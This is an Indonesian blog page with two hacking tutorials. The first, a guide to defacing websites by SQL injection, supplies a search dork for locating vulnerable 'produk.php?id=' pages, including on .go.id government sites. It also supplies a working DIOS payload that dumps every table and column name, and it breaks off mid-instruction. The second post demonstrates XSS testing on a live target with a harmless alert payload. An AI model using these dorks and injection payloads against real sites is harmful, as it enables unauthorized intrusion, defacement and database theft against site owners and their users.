Cara deface SQL injection

Gambar
Assalamu'alaikum wr wb Oke kesempatan kali ini aku akan kash tutorial cara deface metode SQL INJECTION yang masih belum paham apa itu SQL injection?  SQL injection adalah  Injeksi SQL adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Oke kita langsung ajah tutorialnya Pertama kalian siapkan bahannya dulu Bahan:  - Dork - HP/PC - Dios  - pacar biar ada yang semangatin: v Dork: - produk.php?id= site:Iloveyou:)  Kembangin lagi tod biar lebih mantav dapat pacarnya:v Note: site nya terserah yang kalian mau contoh com,  go.id, dan karepmu cok: v Dios:  (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) Oke yang pertama kalian dorking dork yang di atas Yang kedua kalian tambahin (')  itu dibelakang angka contoh: php?id=56' gitu gan nanti akan eror eror nya gak semua yang ada tulisan
2 komentar

Tutorial Xss

Assalamualaikum kawan kawan. 
Di postingan pertama ini saya ingin memberikan tutorial Xss, memang sudah banyak namun disini saya memberi tutorialnya lebih lengkap. 

Disini saya ingin live target
Bahan yang digunakan untuk pentest ini simpel ajah kok, 
1.internet(wifi)
2.target
3.kopi hitam
4.handphone/pc

Udah cuk gak usah banyak basa basi masuk ke tutorialnya saja....

Sebelum masuk tutorial saya jelaskan dulu

Xss adalah singkatan dari istilah cross site scripting 
Cara penyerangannya adalah mengetik payload atau code
Seperti code html atau client script lainnya

Dibawah adalah contoh


Bug xss itu berbahaya karna penyerangan yang disangka penyerangan dari webnya sendiri,payload xss bisa untuk meminta document atau info tentang web,jdi menurut saya bug ini cukup berbahaya.
Namun di tutor ini saya hanya share payload untuk test vuln bug xss atau tidak. 

Hasil dari pencarian nya seperti di bawah ini.

  Sebagaimana yang sudah saya beritahu diatas, saya menggunakan code <script>alert("hai");</script>
Payload/code ini tidak berbahaya karna saya hanya ingin test apakah web tersebut 
Renten terhadap xss atau tidak
Nah untuk payload / code serangan yang berbahaya saya tidak kasih disini di takutkan disalah gunakan...

Jadi mohon maaf bukan saya sok suci 

Nah kawan jadi segitu dulu ya tutorial dari saya, jika ada kesalahan tolong dibantu di comentar soalnya saya juga masih baru. Dan untuk kalian
Jangan sampai salahgunakan internet,karna akan berakibat fatal. 


Sekian dari saya kurang lebihnya mohon maaf


Wassalamualaikum Wr. Wb

Komentar

Posting Komentar